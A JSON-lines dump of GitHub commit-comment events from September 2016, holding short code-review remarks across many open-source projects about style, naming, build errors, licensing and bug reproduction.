{"id":"4553765726","type":"CommitCommentEvent","actor":{"login":"maethor"},"repo":{"name":"Benzhaomin/backupninja"},"payload":{"comment":{"id":18996809,"position":null,"line":null,"path":null,"commit_id":"000d2cf40af10bc0e77b0da4f60142a34b3f3351","created_at":"2016-09-13T06:50:49Z","updated_at":"2016-09-13T06:50:49Z","body":"That's really nice, thank you @Benzhaomin \r\n\r\nA guy (Jerome) from riseup contacted me a week ago. He wanted me to add a licence on my script. I added WTFPL, but feel free to change it for GPLv2 if that is what you want and/or what upstream wants."}},"created_at":"2016-09-13T06:50:49Z"}
{"id":"4553766489","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18996815,"position":35,"line":59,"path":"src/pocketmine/command/defaults/XpCommand.php","commit_id":"049aded7c4abfab7f4bef666f93253fbaa3b9021","created_at":"2016-09-13T06:51:02Z","updated_at":"2016-09-13T06:51:02Z","body":":D i see where this comes from. Bukkit + Forge use that exact way"}},"created_at":"2016-09-13T06:51:02Z"}
{"id":"4553768404","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18996820,"position":51,"line":73,"path":"src/pocketmine/command/defaults/XpCommand.php","commit_id":"049aded7c4abfab7f4bef666f93253fbaa3b9021","created_at":"2016-09-13T06:51:33Z","updated_at":"2016-09-13T06:51:33Z","body":"should be randomized anyways client sided"}},"created_at":"2016-09-13T06:51:33Z"}
{"id":"4553773516","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"mdpradeep/julia"},"payload":{"comment":{"id":18996832,"position":null,"line":null,"path":null,"commit_id":"260de9c1cc85064393608dd9bc5d692dcb52c378","created_at":"2016-09-13T06:53:06Z","updated_at":"2016-09-13T06:53:06Z","body":"there are conflicts, needs a rebase (not a merge commit)"}},"created_at":"2016-09-13T06:53:06Z"}
{"id":"4553774041","type":"CommitCommentEvent","actor":{"login":"thierryvolpiatto"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18996836,"position":8,"line":243,"path":"helm-org.el","commit_id":"7fcf4f8b62fb7cd136f3eb08b6316a8f022a6031","created_at":"2016-09-13T06:53:15Z","updated_at":"2016-09-13T06:53:15Z","body":"\nTianxiang Xiong <notifications@github.com> writes:\n\n> You can try outline-previous-visible-heading and\n> outline-next-visible-heading, which are what the older versions of\n> Org-mode use.\n\nGreat, thanks, I will try this.\n\n> It's also possible to copy the org- functions into Helm itself.\n\nBetter not inlining if possible.\n\n--\nThierry\n"}},"created_at":"2016-09-13T06:53:15Z"}
{"id":"4553774279","type":"CommitCommentEvent","actor":{"login":"raquelalvarezbanos"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":18996837,"position":49,"line":65,"path":"Framework/Algorithms/test/CreateTransmissionWorkspaceTest.h","commit_id":"98e7fcfdd855b235f9c68c4faef9ee2929dacbf1","created_at":"2016-09-13T06:53:18Z","updated_at":"2016-09-13T06:53:18Z","body":"I thought I had run those tests, but maybe I didn't. If that doesn't work you can either use any other unit (different from wavelength and TOF) or go back to the original version where `CreateWorkspace` is used."}},"created_at":"2016-09-13T06:53:18Z"}
{"id":"4553778706","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18996844,"position":10,"line":29,"path":"src/main/scala/mesosphere/marathon/api/MarathonExceptionMapper.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T06:54:34Z","updated_at":"2016-09-13T06:54:34Z","body":"boolean logic swapped?"}},"created_at":"2016-09-13T06:54:34Z"}
{"id":"4553779605","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"Jenly/android_cm_device_xiaomi_aries"},"payload":{"comment":{"id":18996847,"position":null,"line":null,"path":null,"commit_id":"7a8c83a3e9a5048c962f76c44b2a67aaa37282ce","created_at":"2016-09-13T06:54:49Z","updated_at":"2016-09-13T06:54:49Z","body":"@Jenly ok thanks"}},"created_at":"2016-09-13T06:54:49Z"}
{"id":"4553783441","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18996850,"position":12,"line":14,"path":"src/main/scala/mesosphere/marathon/api/PublicServlet.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T06:55:56Z","updated_at":"2016-09-13T06:55:56Z","body":"unused?"}},"created_at":"2016-09-13T06:55:56Z"}
{"id":"4553787320","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":18996853,"position":80,"line":0,"path":"Editor/editing/_components/history/history_manager.h","commit_id":"a08d09e5669e729bfed27f0d23c1ce6ba72d5abd","created_at":"2016-09-13T06:57:03Z","updated_at":"2016-09-13T06:57:03Z","body":"But okay, just change it to 0, because signed integer (or just change to unsigned type)"}},"created_at":"2016-09-13T06:57:03Z"}
{"id":"4553787336","type":"CommitCommentEvent","actor":{"login":"boutros"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":18996854,"position":11,"line":381,"path":"redef/services/src/main/java/no/deichman/services/entity/repository/SPARQLQueryBuilder.java","commit_id":"481319fc719541a93a84f8bac37e39d6c28c8fd8","created_at":"2016-09-13T06:57:04Z","updated_at":"2016-09-13T06:57:04Z","body":"Ja, burde gjøre tilsvarende som ble gjort i massasjer-publikasjon spørringa:\r\nhttps://github.com/digibib/ls.ext/blob/develop/redef/services/src/main/resources/massage_publication_query.sparql"}},"created_at":"2016-09-13T06:57:04Z"}
{"id":"4553788175","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18996855,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T06:57:17Z","updated_at":"2016-09-13T06:57:17Z","body":"@sndnvaps try this audio https://github.com/aosp-msm8960/android_hardware_qcom_audio"}},"created_at":"2016-09-13T06:57:17Z"}
{"id":"4553790631","type":"CommitCommentEvent","actor":{"login":"th6366"},"repo":{"name":"th6366/HurabonoProject"},"payload":{"comment":{"id":18996858,"position":null,"line":null,"path":null,"commit_id":"48d45a740102ca3837c68c58669e95f6bc031713","created_at":"2016-09-13T06:58:00Z","updated_at":"2016-09-13T06:58:00Z","body":"hi~"}},"created_at":"2016-09-13T06:58:00Z"}
{"id":"4553791948","type":"CommitCommentEvent","actor":{"login":"Shauren"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18996862,"position":120,"line":1907,"path":"src/server/game/Entities/Item/Item.cpp","commit_id":"a78aa3cf4ef3f33903ec9f06d8fdc46e81c51cb3","created_at":"2016-09-13T06:58:22Z","updated_at":"2016-09-13T06:58:22Z","body":"Why are you commenting on commits? This isn't even the latest version for SMSG_UPDATE_OBJECT changes. If anything is broken, open an issue about it."}},"created_at":"2016-09-13T06:58:22Z"}
{"id":"4553792801","type":"CommitCommentEvent","actor":{"login":"LukaszWiktor"},"repo":{"name":"karmon/voucherify-php-sdk"},"payload":{"comment":{"id":18996864,"position":null,"line":null,"path":null,"commit_id":"db8b0d734c65070e5779d35364431e217d7b5bb0","created_at":"2016-09-13T06:58:37Z","updated_at":"2016-09-13T06:58:37Z","body":"Hi Assaf! Could you make a Pull Request? So we could merge it with the original repository."}},"created_at":"2016-09-13T06:58:37Z"}
{"id":"4553792940","type":"CommitCommentEvent","actor":{"login":"jandob"},"repo":{"name":"jandob/ccf"},"payload":{"comment":{"id":18996865,"position":41,"line":49,"path":"R/cca.R","commit_id":"a0eb60f0797ae1c10be57d4838d22ec8c07c4e52","created_at":"2016-09-13T06:58:38Z","updated_at":"2016-09-13T06:58:38Z","body":"use rank from qr_decomp"}},"created_at":"2016-09-13T06:58:38Z"}
{"id":"4553793859","type":"CommitCommentEvent","actor":{"login":"chrisjansky"},"repo":{"name":"chrisjansky/veneo"},"payload":{"comment":{"id":18996866,"position":null,"line":null,"path":null,"commit_id":"1c2e0c73eef487782133e59179e67e38c516ccd5","created_at":"2016-09-13T06:58:55Z","updated_at":"2016-09-13T06:58:55Z","body":"Teď jsem si repo naklonoval, dal npm install, bower install, gulp svg a gulp (spuštění serveru) a vše mi funguje OK, jen fonty – pochopitelně – chybí. Jakou máš verzi node? Já používám NVM a verzi node 2.14.7, takže mě napadá jen chyba v tom."}},"created_at":"2016-09-13T06:58:55Z"}
{"id":"4553794527","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":18996868,"position":null,"line":null,"path":null,"commit_id":"552f2e4b5f5f9db2c3818fad86a18c49559dfda4","created_at":"2016-09-13T06:59:06Z","updated_at":"2016-09-13T06:59:06Z","body":"No it works just fine. \r\nhttps://github.com/BenzoRoms/frameworks_support/commit/2ed63d49dfaa08ab689105495704e857c1e76ca9"}},"created_at":"2016-09-13T06:59:06Z"}
{"id":"4553794886","type":"CommitCommentEvent","actor":{"login":"chrisjansky"},"repo":{"name":"chrisjansky/veneo"},"payload":{"comment":{"id":18996870,"position":null,"line":null,"path":null,"commit_id":"1c2e0c73eef487782133e59179e67e38c516ccd5","created_at":"2016-09-13T06:59:12Z","updated_at":"2016-09-13T06:59:12Z","body":"Jak chceš ty, nejčistší mi příjde commit revertnout."}},"created_at":"2016-09-13T06:59:12Z"}
{"id":"4553797984","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18996878,"position":49,"line":179,"path":"src/main/scala/mesosphere/marathon/core/election/impl/CuratorElectionService.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T07:00:03Z","updated_at":"2016-09-13T07:00:03Z","body":"this looks like a semantic change. we're sure that this is safe?"}},"created_at":"2016-09-13T07:00:03Z"}
{"id":"4553800881","type":"CommitCommentEvent","actor":{"login":"tobyhede"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":18996899,"position":5,"line":5,"path":"spec/controllers/dashboards_controller_spec.rb","commit_id":"4d919dc382f13590df65659339036630cda49587","created_at":"2016-09-13T07:00:49Z","updated_at":"2016-09-13T07:00:49Z","body":"We don't need to log the users in here yet. "}},"created_at":"2016-09-13T07:00:49Z"}
{"id":"4553801361","type":"CommitCommentEvent","actor":{"login":"micbou"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":18996902,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-13T07:00:57Z","updated_at":"2016-09-13T07:00:57Z","body":"I was able to reproduce with [this Vim](http://www.vim.org/download.php#pc) but it is not specific to YouCompleteMe. This version of Vim does not throw a Python exception when an error occurs while evaluating a Vim expression. The following code in Vimscript:\r\n```viml\r\npython << EOF\r\nimport vim\r\ntry:\r\n  vim.eval( 'invalid_eval' )\r\nexcept vim.error:\r\n  pass\r\nEOF\r\n```\r\nwill raise these errors:\r\n```viml\r\nE121: Undefined variable: invalid_eval\r\nE15: Invalid expression: invalid_eval\r\n```\r\nwhile the documentation (`:h python-error`) says:\r\n> Upon encountering a Vim error, Python raises an exception of type vim.error.\r\n\r\nI don't think there is anything we can do to work around this bug. I recommend to use [a newer version of Vim on Windows](https://bintray.com/micbou/generic/vim/view)."}},"created_at":"2016-09-13T07:00:57Z"}
{"id":"4553803986","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18996909,"position":4,"line":133,"path":"test/testFakeapp-ezmasterized.js","commit_id":"ef6e044b621cacad6de612a21e3ed24e72652cbd","created_at":"2016-09-13T07:01:33Z","updated_at":"2016-09-13T07:01:33Z","body":"Je l'ai testé dans un environnement SANS variable DEBUG."}},"created_at":"2016-09-13T07:01:33Z"}
{"id":"4553807840","type":"CommitCommentEvent","actor":{"login":"keeeith"},"repo":{"name":"keeeith/dfs-solver"},"payload":{"comment":{"id":18996914,"position":null,"line":null,"path":null,"commit_id":"dcd14daa1563b3794de0c023efe990d9a832d039","created_at":"2016-09-13T07:02:32Z","updated_at":"2016-09-13T07:02:32Z","body":"Nice change, thanks for that!"}},"created_at":"2016-09-13T07:02:32Z"}
{"id":"4553808216","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18996915,"position":null,"line":null,"path":null,"commit_id":"aed8dca28682a787b7f38c8ed12c55b3777ddaf2","created_at":"2016-09-13T07:02:37Z","updated_at":"2016-09-13T07:02:37Z","body":"J'espère n'avoir rien cassé (en tout cas les tests continuent à marcher)."}},"created_at":"2016-09-13T07:02:37Z"}
{"id":"4553808948","type":"CommitCommentEvent","actor":{"login":"andersonfaaria"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":18996916,"position":null,"line":null,"path":null,"commit_id":"b7fb97cb1c9d2c92cb28d10ea0cdb0c0943a5fb1","created_at":"2016-09-13T07:02:48Z","updated_at":"2016-09-13T07:02:48Z","body":"@ranisalt are you sure about this? I reverted this commit and it really feels better ingame. Specially in ranged monsters since they don't really move to reach target. "}},"created_at":"2016-09-13T07:02:48Z"}
{"id":"4553811369","type":"CommitCommentEvent","actor":{"login":"gortonz"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":18996920,"position":5,"line":5,"path":"spec/controllers/dashboards_controller_spec.rb","commit_id":"4d919dc382f13590df65659339036630cda49587","created_at":"2016-09-13T07:03:24Z","updated_at":"2016-09-13T07:03:24Z","body":"This is the devise doc suggests to get controller tests work"}},"created_at":"2016-09-13T07:03:24Z"}
{"id":"4553811821","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18996921,"position":13,"line":58,"path":"src/main/scala/mesosphere/marathon/core/health/HealthCheck.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T07:03:30Z","updated_at":"2016-09-13T07:03:30Z","body":"perf improvement? or some other reason for this change?"}},"created_at":"2016-09-13T07:03:30Z"}
{"id":"4553813708","type":"CommitCommentEvent","actor":{"login":"Sleet01"},"repo":{"name":"xws-bench/bench"},"payload":{"comment":{"id":18996924,"position":29,"line":1230,"path":"src/units.js","commit_id":"1e6eaaed230732d7110fd66ad906c047f873ce78","created_at":"2016-09-13T07:04:04Z","updated_at":"2016-09-13T07:04:04Z","body":"Did this cause Issue #12 ?"}},"created_at":"2016-09-13T07:04:04Z"}
{"id":"4553817511","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18996933,"position":5,"line":150,"path":"src/main/scala/mesosphere/marathon/core/heartbeat/MesosHeartbeatMonitor.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T07:05:00Z","updated_at":"2016-09-13T07:05:00Z","body":"this was specifically a more generic type vs. SchedulerDriver. I didn't want clients doing anything with the result other than comparing reference equality"}},"created_at":"2016-09-13T07:05:00Z"}
{"id":"4553817963","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18996934,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T07:05:10Z","updated_at":"2016-09-13T07:05:10Z","body":"There are a couple of things you may want to consider first.\r\nType of media (swap on SDcards and USB sticks may not be a good idea)\r\nTotal RAM (Puppy rarely swaps with 1 GB RAM and almost never with 2GB even if swappiness is left to the default \"60\")\r\nBTW setting swappines to 10 or 20 if more than 1GB RAM may be a good idea (certainly if more than 2GB)\r\nRegarding location of pupswap unless we are in pupmode 5|77, /mnt/home should work for evrything. In 5|77 ask/suggest"}},"created_at":"2016-09-13T07:05:10Z"}
{"id":"4553818581","type":"CommitCommentEvent","actor":{"login":"brockuniera"},"repo":{"name":"brockuniera/llgo"},"payload":{"comment":{"id":18996935,"position":4,"line":490,"path":"cmd/gllgo/gllgo.go","commit_id":"ef7dafa33f6d350db51c246a0cefe32b02bef535","created_at":"2016-09-13T07:05:19Z","updated_at":"2016-09-13T07:05:19Z","body":"This change also breaks the build, none of these lines call existing methods."}},"created_at":"2016-09-13T07:05:19Z"}
{"id":"4553820446","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18996939,"position":115,"line":115,"path":"spring-core/src/main/java/org/springframework/core/codec/ResourceRegionEncoder.java","commit_id":"cc0020db027ad1185d5a0297ca161638007d9cc2","created_at":"2016-09-13T07:05:51Z","updated_at":"2016-09-13T07:05:51Z","body":"This should be changed to use a `ReadableByteChannel` as soon as #1168 is merged."}},"created_at":"2016-09-13T07:05:51Z"}
{"id":"4553826904","type":"CommitCommentEvent","actor":{"login":"wiewioraseb"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18996971,"position":null,"line":null,"path":null,"commit_id":"94e95a2bcb157657ce09e241386a0f526059ee0c","created_at":"2016-09-13T07:07:39Z","updated_at":"2016-09-13T07:07:39Z","body":"I get the error connected with 'createInputTransfer':\r\n```\r\n[default] some_dir\\src\\app\\app.module.ts:6:41\r\n    Module '\"some_dir/node_modules/@angularclass/hmr/dist/index\"' has no exported member 'createInputTransfer'.\r\n[default] Checking finished with 1 errors\r\n```\r\n"}},"created_at":"2016-09-13T07:07:39Z"}
{"id":"4553827788","type":"CommitCommentEvent","actor":{"login":"zoidbergwill"},"repo":{"name":"SunDwarf/Kyoukai"},"payload":{"comment":{"id":18996972,"position":6,"line":9,"path":"kyoukai/util.py","commit_id":"d39a4953748fa9e492151b15dc92b75563cf4096","created_at":"2016-09-13T07:07:53Z","updated_at":"2016-09-13T07:07:53Z","body":"Should there be a version on PyPI with:\r\n\r\n```\r\nVERSION = \"1.9.2post1\"\r\nVERSIONT = tuple(map(int, VERSION.split('.')))\r\n```"}},"created_at":"2016-09-13T07:07:53Z"}
{"id":"4553828506","type":"CommitCommentEvent","actor":{"login":"russss"},"repo":{"name":"russss/pydsn"},"payload":{"comment":{"id":18996973,"position":72,"line":72,"path":"parser.py","commit_id":"fd901137b3f5b672f3c873c51c1c3630710d4222","created_at":"2016-09-13T07:08:07Z","updated_at":"2016-09-13T07:08:07Z","body":"> I am just asking as this afternoon I saw CHDR on 2 dishes, but only active on one, which is normal, just wondering what other multiple normals may exist.\r\n\r\nI have seen all of the following situations:\r\n\r\n* Uplink and/or downlink on one dish\r\n* Uplink and two downlinks from the same spacecraft on one dish\r\n* Downlink for two different spacecraft on one dish (Multiple Spacecraft Per Aperture - this happens with the Mars probes)\r\n* Downlink for the same spacecraft on multiple dishes at the same location\r\n* Downlink for a spacecraft at one location, with another location setting up to take over"}},"created_at":"2016-09-13T07:08:07Z"}
{"id":"4553829616","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18996975,"position":33,"line":131,"path":"spring-core/src/test/java/org/springframework/core/io/buffer/DataBufferUtilsTests.java","commit_id":"44bd339afdd7ed46936f9453803131a621b91456","created_at":"2016-09-13T07:08:25Z","updated_at":"2016-09-13T07:08:25Z","body":"Did you run this test with memory leak detection? See http://netty.io/wiki/reference-counted-objects.html#leak-detection-levels"}},"created_at":"2016-09-13T07:08:25Z"}
{"id":"4553831512","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18996979,"position":27,"line":398,"path":"spring-core/src/main/java/org/springframework/util/ResourceUtils.java","commit_id":"44bd339afdd7ed46936f9453803131a621b91456","created_at":"2016-09-13T07:08:54Z","updated_at":"2016-09-13T07:08:54Z","body":"Let's return an OptionalLong here."}},"created_at":"2016-09-13T07:08:54Z"}
{"id":"4553833708","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18996982,"position":13,"line":20,"path":"test/testFakeapp-ezmasterized.js","commit_id":"aed8dca28682a787b7f38c8ed12c55b3777ddaf2","created_at":"2016-09-13T07:09:31Z","updated_at":"2016-09-13T07:09:31Z","body":"Tu sais que tu as choqué un collègue en plaçant `path.join` au début de la ligne..."}},"created_at":"2016-09-13T07:09:31Z"}
{"id":"4553837289","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18996987,"position":1,"line":1,"path":"CryptoChat.iml","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:10:27Z","updated_at":"2016-09-13T07:10:27Z","body":"Эти файлы не нужно добавлять"}},"created_at":"2016-09-13T07:10:27Z"}
{"id":"4553838831","type":"CommitCommentEvent","actor":{"login":"FrancescVargas"},"repo":{"name":"FrancescVargas/entrenador"},"payload":{"comment":{"id":18996993,"position":null,"line":null,"path":null,"commit_id":"e7ef9c2fad6c5578ab934eec396b2887b0db904a","created_at":"2016-09-13T07:10:52Z","updated_at":"2016-09-13T07:10:52Z","body":"Subidos los archivos gitignore y composer.json"}},"created_at":"2016-09-13T07:10:52Z"}
{"id":"4553839384","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18996994,"position":1,"line":1,"path":"app/app.iml","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:11:02Z","updated_at":"2016-09-13T07:11:02Z","body":"Это тоже не надо добавлять, нужно добавить *.iml в .gitignore."}},"created_at":"2016-09-13T07:11:02Z"}
{"id":"4553840839","type":"CommitCommentEvent","actor":{"login":"jdef"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":18996996,"position":26,"line":751,"path":"src/main/scala/mesosphere/marathon/state/AppDefinition.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T07:11:24Z","updated_at":"2016-09-13T07:11:24Z","body":"isn't is more expensive to build an intermediate collection?"}},"created_at":"2016-09-13T07:11:24Z"}
{"id":"4553841184","type":"CommitCommentEvent","actor":{"login":"pitiphong-p"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18996997,"position":43,"line":43,"path":"OmiseSwift/ListRequest.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T07:11:30Z","updated_at":"2016-09-13T07:11:30Z","body":"This class is not being used anymore. Will remove it in the refactoring phase"}},"created_at":"2016-09-13T07:11:30Z"}
{"id":"4553841343","type":"CommitCommentEvent","actor":{"login":"Slava"},"repo":{"name":"apollostack/optics-agent-js"},"payload":{"comment":{"id":18997000,"position":null,"line":null,"path":null,"commit_id":"16e2891e83e7c794e25840461f3515e2c1f0609a","created_at":"2016-09-13T07:11:32Z","updated_at":"2016-09-13T07:11:32Z","body":"🙏  & 🚢 "}},"created_at":"2016-09-13T07:11:32Z"}
{"id":"4553842139","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18997002,"position":120,"line":120,"path":"spring-core/src/main/java/org/springframework/core/codec/ResourceRegionEncoder.java","commit_id":"44bd339afdd7ed46936f9453803131a621b91456","created_at":"2016-09-13T07:11:45Z","updated_at":"2016-09-13T07:11:45Z","body":"I would rename this method to `getAsciiBytes()` just to make it clear that you cannot expect higher order bytes to be correctly encoded."}},"created_at":"2016-09-13T07:11:45Z"}
{"id":"4553842664","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"madec-project/ezvis"},"payload":{"comment":{"id":18997004,"position":6,"line":10,"path":"Dockerfile","commit_id":"4a36cb3eea42b69defc437132fb4cf1be665f3f0","created_at":"2016-09-13T07:11:54Z","updated_at":"2016-09-13T07:11:54Z","body":"Je n'avais pas conscience qu'on pouvait faire ça!\r\nSuper!"}},"created_at":"2016-09-13T07:11:54Z"}
{"id":"4553842849","type":"CommitCommentEvent","actor":{"login":"declension"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":18997005,"position":null,"line":null,"path":null,"commit_id":"9d5d71b012ee4db9b676f6738198ccd7987a9c6a","created_at":"2016-09-13T07:11:57Z","updated_at":"2016-09-13T07:11:57Z","body":"Wow, that was fast. Thanks!"}},"created_at":"2016-09-13T07:11:57Z"}
{"id":"4553847499","type":"CommitCommentEvent","actor":{"login":"jimmidyson"},"repo":{"name":"fabric8io/gofabric8"},"payload":{"comment":{"id":18997014,"position":83,"line":0,"path":"cmds/install.go","commit_id":"21c75937f024e615884973bbc2bdac7dee8d5897","created_at":"2016-09-13T07:13:16Z","updated_at":"2016-09-13T07:13:16Z","body":"Cool. I haven't checked, but do you output why the sudo password is required before it's requested?"}},"created_at":"2016-09-13T07:13:16Z"}
{"id":"4553851551","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18997033,"position":2,"line":2,"path":"app/src/main/res/layout/activity_contact_list.xml","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:14:25Z","updated_at":"2016-09-13T07:14:25Z","body":"RelativeLayout не нужен для такого простого лаяута. Достаточно простого FrameLayout.\r\nRelativeLayout нужен чтобы размещать элементы относительно друг друга из за этого он рисуется в 2 прохода. \r\n"}},"created_at":"2016-09-13T07:14:25Z"}
{"id":"4553851722","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18997034,"position":27,"line":398,"path":"spring-core/src/main/java/org/springframework/util/ResourceUtils.java","commit_id":"cc0020db027ad1185d5a0297ca161638007d9cc2","created_at":"2016-09-13T07:14:28Z","updated_at":"2016-09-13T07:14:28Z","body":"Let's return an `java.util.OptionalLong` here."}},"created_at":"2016-09-13T07:14:28Z"}
{"id":"4553852896","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18997037,"position":27,"line":27,"path":"app/src/main/java/com/streamdata/leon/cryptochat/models/Message.java","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:14:48Z","updated_at":"2016-09-13T07:14:48Z","body":"Давайте поля в начале делать, это стандартный codestyle."}},"created_at":"2016-09-13T07:14:48Z"}
{"id":"4553854451","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18997042,"position":27,"line":27,"path":"app/src/main/java/com/streamdata/leon/cryptochat/models/Message.java","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:15:14Z","updated_at":"2016-09-13T07:15:14Z","body":"Хорошая практика - добавлять final к полям модельного класса."}},"created_at":"2016-09-13T07:15:14Z"}
{"id":"4553855351","type":"CommitCommentEvent","actor":{"login":"helloliang"},"repo":{"name":"helloliang/test"},"payload":{"comment":{"id":18997044,"position":null,"line":null,"path":null,"commit_id":"030faad412498f843cedc16387ddf616650f061a","created_at":"2016-09-13T07:15:27Z","updated_at":"2016-09-13T07:15:27Z","body":"kjn"}},"created_at":"2016-09-13T07:15:27Z"}
{"id":"4553855850","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18997046,"position":23,"line":23,"path":"app/src/main/java/com/streamdata/leon/cryptochat/models/Message.java","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:15:35Z","updated_at":"2016-09-13T07:15:35Z","body":"В Java принято писать методы CamelCase т.е. слитно - getSentTime"}},"created_at":"2016-09-13T07:15:35Z"}
{"id":"4553857869","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18997053,"position":73,"line":73,"path":"spring-web/src/main/java/org/springframework/http/codec/ResourceRegionHttpMessageWriter.java","commit_id":"9147f3f9b84298dc11b82dcf6d1381eea3ea4dcf","created_at":"2016-09-13T07:16:10Z","updated_at":"2016-09-13T07:16:10Z","body":"missing space between `if` and `(`"}},"created_at":"2016-09-13T07:16:10Z"}
{"id":"4553858334","type":"CommitCommentEvent","actor":{"login":"ComiR"},"repo":{"name":"kitsunet/Flowpack.ElasticSearch.ContentRepositoryAdaptor"},"payload":{"comment":{"id":18997054,"position":51,"line":236,"path":"Classes/Flowpack/ElasticSearch/ContentRepositoryAdaptor/Command/NodeIndexCommandController.php","commit_id":"9fcab09af585e4335d3884f4a82843511cb93811","created_at":"2016-09-13T07:16:17Z","updated_at":"2016-09-13T07:16:17Z","body":"`@return integer Number of indexed nodes in this workspace`"}},"created_at":"2016-09-13T07:16:17Z"}
{"id":"4553860406","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":18997062,"position":5,"line":15,"path":"SEO/BLL/CrawlManager.cs","commit_id":"746b0efad975b0bb4b970925313a9d25fc9025a5","created_at":"2016-09-13T07:16:51Z","updated_at":"2016-09-13T07:16:51Z","body":"Why do you use \"CrawlsManager\" as name of the function? Provide more reasonable one"}},"created_at":"2016-09-13T07:16:51Z"}
